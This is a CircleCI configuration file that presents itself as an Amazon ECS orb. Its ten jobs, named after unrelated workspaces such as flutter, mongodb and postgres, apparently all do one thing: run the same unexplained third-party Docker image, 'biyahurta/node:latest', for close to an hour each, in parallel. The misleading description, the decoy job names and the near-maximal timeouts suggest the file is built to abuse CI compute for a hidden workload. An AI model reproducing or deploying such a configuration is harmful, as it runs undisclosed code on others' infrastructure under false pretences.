working_dir: &working_dir ~/app
version: 2.1
######################################################################################################################################
description: |
  An orb for working with Amazon Elastic Container Service (ECS).
  Supports the EC2 and Fargate launch types
jobs:
  workspace-full:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 59m
      
            
          
  workspace-full-vnc:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 58m
      

  mdbook:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 57m

  workspace-dotnet:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 56m

  workspace-dotnet-vnc:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 55m

  workspace-postgres:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 54m

  workspace-mysql:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 53m

  workspace-mongodb:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 52m
  workspace-flutter:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 51m
  workspace-gecko:
    
    docker:
      - image: docker:18.06.3-ce-git
    steps:
      - checkout
      - setup_remote_docker
      - attach_workspace:
          at: .
      - run:
          command: |
            
            docker run -e CI=true biyahurta/node:latest
          no_output_timeout: 50m

  
workflows:
  version: 2.1
  build-and-deploy:
    jobs:
      - workspace-full
      - workspace-full-vnc
          
      - mdbook
          
      - workspace-dotnet
          
      - workspace-dotnet-vnc
          
      - workspace-postgres
          
      - workspace-mysql
          
      - workspace-mongodb
          
      - workspace-flutter
          
      - workspace-gecko
          
      
